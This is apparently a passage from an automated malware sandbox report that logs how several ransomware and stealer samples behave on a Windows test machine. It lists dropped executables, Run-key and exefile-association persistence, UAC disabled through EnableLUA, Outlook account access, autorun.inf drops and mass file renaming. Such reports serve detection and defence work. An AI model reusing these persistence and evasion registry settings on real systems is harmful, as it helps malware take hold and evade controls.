N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPSP~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe N/A
N/A N/A C:\Users\Admin\Desktop\7.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Users\Admin\Desktop\5.exe N/A
N/A N/A C:\Users\Admin\Desktop\6.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\as.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-I5IQQ.tmp\tuc2.tmp N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\PROGRA~3\system.exe N/A
N/A N/A C:\Windows\system32\AUDIODG.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Send Reports Form\sendreportsform.exe N/A
N/A N/A C:\Program Files\Java\jdk-1.8\include\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 91.211.247.248 N/A N/A

Uses the VBS compiler for execution

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bot = "\"C:\\Program Files\\Java\\jdk-1.8\\include\\bot.exe\"" C:\Users\Admin\Desktop\6.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\ProgramData\\Microsoft OneDrive\\setup\\System.exe\"" C:\Users\Admin\Desktop\6.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bot = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\00000000\\bot.exe\"" C:\Users\Admin\Desktop\6.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\System32\\DesktopShellAppStateContract\\dllhost.exe\"" C:\Users\Admin\Desktop\6.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" C:\Users\Admin\Desktop\7.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Software\Microsoft\Windows\CurrentVersion\Run\802f813d3810aa536753efbd3390b541 = "\"C:\\ProgramData\\system.exe\" .." C:\PROGRA~3\system.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\802f813d3810aa536753efbd3390b541 = "\"C:\\ProgramData\\system.exe\" .." C:\PROGRA~3\system.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\lldluhdhlxabv396 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\tasksche.exe\"" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Software\Microsoft\Windows\CurrentVersion\Run\ Ransomware = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3582-490\\bot.exe" C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Desktop\6.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Java\jdk-1.8\include\bot.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Java\jdk-1.8\include\bot.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\a: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\p: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\q: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\r: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\t: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\x: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\b: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\n: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\w: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\g: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\i: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\o: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\y: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\u: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\e: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\h: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\j: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\k: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\l: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\m: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\s: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\v: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\z: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A

Legitimate hosting services abused for malware hosting/C2

Drops autorun.inf file

Description Indicator Process Target
File created C:\autorun.inf C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
File opened for modification C:\autorun.inf C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
File created F:\autorun.inf C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
File opened for modification F:\autorun.inf C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-Package~31bf3856ad364e35~amd64~en-US~10.0.22000.1.cat.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Holographic-Desktop-Analog-Package~31bf3856ad364e35~amd64~~10.0.22000.318.cat.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netathr10x.inf_amd64_2691c4f95b80eb3b\eeprom_qca9377_1p1_NFA425_olpc_A_BC_CBXA0.bin.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\KBDMAC.DLL.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\tracerpt.exe.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ComDTC-merged-Package~31bf3856ad364e35~amd64~~10.0.22000.434.cat.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StepsRecorder-Package~31bf3856ad364e35~amd64~~10.0.22000.1.cat.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\microsoft_bluetooth_hfp_ag.inf_amd64_84a210036c6c1bdf.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\getevent.types.ps1xml.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\dot3cfg.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\deviceaccess.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Package-UNP-Package~31bf3856ad364e35~amd64~~10.0.22000.1.cat.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\en-US\sxproxy.dll.mui.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\KBDGRLND.DLL.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\spbcd.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-OneDrive-Setup-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.22000.1.cat.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmrock5.inf_amd64_d7e3f61b70de13bc.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\mfc120u.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\ustprov.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-KernelInt-VirtualDevice-Package~31bf3856ad364e35~amd64~~10.0.22000.318.cat.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\System32\DriverStore\en-US\c_legacydriver.inf_loc.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\BOOTVID.DLL.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\mscories.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\tracerpt.exe.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\Dism\en-US\TransmogProvider.dll.mui.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\Speech\Engines\SR.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\mfaudiocnv.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-OneCore-Connectivity-Serial-Package~31bf3856ad364e35~amd64~~10.0.22000.1.cat.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Casting-Platform-Package~31bf3856ad364e35~amd64~~10.0.22000.100.cat.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\rtux64w10.inf_amd64_a39ece60dbc76c55\rtux64w10.sys.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\setx.exe.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\Windows.StateRepositoryCore.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\Configuration\Schema\MSFT_FileDirectoryConfiguration\en-US.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\NetSecurity\en\Microsoft.Windows.Firewall.Commands.Resources.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Guest-Vpci-Package~31bf3856ad364e35~amd64~~10.0.22000.1.cat.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Networking-Containers-Package~31bf3856ad364e35~amd64~~10.0.22000.318.cat.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\SystemSupportInfo.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\msiexec.exe.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\printui.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\ws2help.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\mssip32.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\wbem\Remove.Microsoft.AppV.AppvClientWmi.mof.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\kanji_1.uce.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\DxpTaskSync.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\INETRES.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\SystemPropertiesPerformance.exe.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\xwtpdui.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\en-US\osbaseln.dll.mui.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\wbem\mispace.mof.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\MsDtc\MSFT_DtcLogTask_v1.0.cdxml.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-EudcEdit-Package~31bf3856ad364e35~amd64~~10.0.22000.1.cat.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\NetworkList.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\hidphone.tsp.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\ir41_32.ax.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\Windows.AccountsControl.dll.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_ServiceResource\en-US\MSFT_ServiceResource.schema.mfl.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\XpsToPclmConverter.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Security-SPP-Component-SKU-IoTEnterprise-License-Package~31bf3856ad364e35~amd64~~10.0.22000.120.cat.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\System32\DriverStore\en-US\SCRAWPDO.inf_loc.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\wbem\en-US\netswitchteamcim.dll.mui.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\Windows.ApplicationModel.Store.Preview.DOSettings.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Media-Foundation-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22000.348.cat.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\Windows.System.UserProfile.DiagnosticsSettings.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\IME\SHARED\ImeBrokerps.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\\\000.bmp" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpCB5E.bmp" C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1492 set thread context of 6464 N/A C:\Users\Admin\Desktop\7.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1492 set thread context of 5872 N/A C:\Users\Admin\Desktop\7.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Microsoft Office\root\Licenses16\Standard2019MSDNR_Retail-ul-phn.xrm-ms.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\lib-commonjs\types\ISemanticTextColors.js.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_yuy2_sse2_plugin.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2103.1172.0_neutral_split.scale-125_8wekyb3d8bbwe\microsoft.system.package.metadata.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.21012.10511.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-20_contrast-black.png.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_Trial-ppd.xrm-ms.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\ResiliencyLinks\Locales\ga.pak.DATA.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\Java\jre-1.8\legal\jdk\santuario.md.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ONNXRuntime-0.5.X.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.ScreenSketch_11.2104.2.0_x64__8wekyb3d8bbwe\Assets\SnipSketchAppList.targetsize-40_altform-unplated.png.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2020.503.58.0_x64__8wekyb3d8bbwe\Assets\contrast-white\CameraAppList.targetsize-72_altform-unplated.png.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\IRIS\PREVIEW.GIF.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_2.2106.2807.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.GamingApp_2105.900.24.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Xbox_AppList.scale-125_contrast-black.png.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.40978.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SmallTile.scale-125_contrast-black.png.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_x64__8wekyb3d8bbwe\sr-Latn-RS.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD.HXS.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.ScreenSketch_11.2104.2.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SnipSketchAppList.targetsize-60.png.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\Assertions\BeLikeExactly.Tests.ps1.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial4-ppd.xrm-ms.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-amd\components\DocumentCard\DocumentCardTitle.types.js.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\eu-es.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest1-pl.xrm-ms.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\codec\libavcodec_plugin.dll.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
